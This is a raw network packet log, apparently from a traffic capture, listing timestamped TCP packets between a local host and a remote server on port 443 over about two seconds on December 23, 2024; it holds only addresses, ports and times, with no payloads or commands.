                                                                                                                                          Dec 23, 2024 17:21:23.457149982 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.457156897 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.457182884 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.457195044 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.457271099 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.463402987 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.463434935 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.463488102 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.463488102 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.463521004 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.469636917 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.469660997 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.469803095 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.469830990 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.476025105 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.476057053 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.476183891 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.476206064 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.482762098 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.482774019 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.482939005 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.482965946 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.489048004 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.489079952 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.489180088 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.489218950 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.495371103 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.495394945 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.495452881 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.495484114 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.495523930 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.501784086 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.501815081 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.501853943 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.501882076 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.501889944 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.547147036 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.652192116 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.652223110 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.652304888 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.652338028 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.652375937 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.652451038 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.652924061 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.658426046 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.658464909 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.658582926 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.658582926 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.658606052 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.664752007 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.664848089 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.664848089 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.664871931 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.665014982 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.671880960 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.671912909 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.671962976 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.671977997 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.671984911 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.672056913 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.677747965 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.677767038 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.677860022 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.677867889 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.677947044 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.678620100 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.684108019 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.684127092 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.684242964 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.684242964 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.684264898 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.690443993 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.690500021 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.690521002 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.690535069 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.690608978 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.734611034 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.734630108 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.781472921 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.841291904 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.841311932 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.841361046 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.841448069 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.841448069 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.841469049 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.841639996 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.842050076 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.847475052 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.847491026 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.848311901 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.848323107 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.853844881 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.853867054 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.854053020 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.854053020 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.854065895 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.860353947 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.860419035 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.860425949 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.860436916 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.860513926 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.860970974 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.861085892 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.867330074 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.867357969 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.867389917 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.867404938 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.867419004 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.867489100 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.867916107 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.873253107 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.873276949 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.873361111 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.873361111 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.873373985 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.879647017 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.879693031 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.879736900 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.879750013 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.879810095 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.891777039 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.891824007 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.891895056 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.891922951 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:23.891932011 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.892002106 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:23.929584980 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:24.036890030 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:24.036921978 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:24.036958933 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:24.037008047 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:24.037053108 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:24.037184954 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:24.043355942 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:24.043394089 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:24.043529987 CET49783443192.168.2.952.217.75.84
Dec 23, 2024 17:21:24.043530941 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.043559074 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.049835920 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.049864054 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.049993992 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.049993992 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.050028086 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.056006908 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.056041002 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.056092978 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.056092978 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.056119919 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.062709093 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.062807083 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.062824965 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.062849998 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.062916994 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.062916994 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.069104910 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.069127083 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.069169044 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.069201946 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.069230080 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.069237947 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.075455904 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.075489044 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.075561047 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.075561047 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.075587988 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.125474930 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.186018944 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.227278948 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.227309942 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.227370024 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.227382898 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.227720976 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.227720976 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.227983952 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.233623981 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.233639956 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.233712912 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.233725071 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.240638018 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.240705967 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.240889072 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.240906000 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.240951061 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.241136074 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.247014999 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.247040987 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.247078896 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.247082949 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.247090101 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.247189045 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.247189045 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.252902985 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.252927065 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.253119946 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.253119946 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.253148079 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.259399891 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.259449005 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.259497881 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.259512901 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.259521008 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.266349077 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.266396046 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.266428947 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.266473055 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.266617060 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.266617060 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.272674084 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.272703886 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.272730112 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.272754908 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.272814035 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.272814035 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.272824049 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.328303099 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.422828913 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.422863960 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.422939062 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.422951937 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.422966957 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.422972918 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.422986984 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.429758072 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.429780960 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.429841042 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.429851055 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.429864883 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.435822010 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.435839891 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.435880899 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.435890913 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.435956955 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.441786051 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.441836119 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.441983938 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.441983938 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.441994905 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.448465109 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.448575020 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.448601007 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.448622942 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.448669910 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.454868078 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.454910994 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.455101967 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.455101967 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.455126047 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.455203056 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.461332083 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.461352110 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.461510897 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.461543083 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.461647034 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.462191105 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.491944075 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.611380100 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.611407995 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.611597061 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.611624002 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.612023115 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.612165928 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.618438959 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.618473053 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.618581057 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.618581057 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.618606091 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.624914885 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.624938965 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.625042915 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.625042915 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.625066042 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.631071091 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.631086111 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.631185055 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.631185055 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.631213903 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.637484074 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.637505054 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.637593985 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.637618065 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.637684107 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.644181967 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.644232035 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.644284010 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.644285917 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.644285917 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.644309044 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.644390106 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.650568008 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.650587082 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.650621891 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.650690079 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.650710106 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.650774002 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.656815052 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.656836033 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.656991959 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.656991959 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.657020092 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.659074068 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.807189941 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.807224035 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.807337046 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.807337046 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.807363033 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.807482004 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.807554007 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.813874006 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.813905954 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.814198017 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.814198017 CET  49783  443    192.168.2.9   52.217.75.84
Dec 23, 2024 17:21:24.814229965 CET  443    49783  52.217.75.84  192.168.2.9
Dec 23, 2024 17:21:24.820202112 CET  443    49783  52.217.75.84  192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:24.820240021 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:24.820538044 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:24.820538044 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:24.820555925 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:24.821108103 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:24.822613001 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:24.873709917 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:25.126418114 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:25.381870031 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:25.381931067 CET4434978352.217.75.84192.168.2.9
                                                                                                                                          Dec 23, 2024 17:21:25.381968021 CET49783443192.168.2.952.217.75.84
                                                                                                                                          Dec 23, 2024 17:21:25.381975889 CET4434978352.217.75.84192.168.2.9
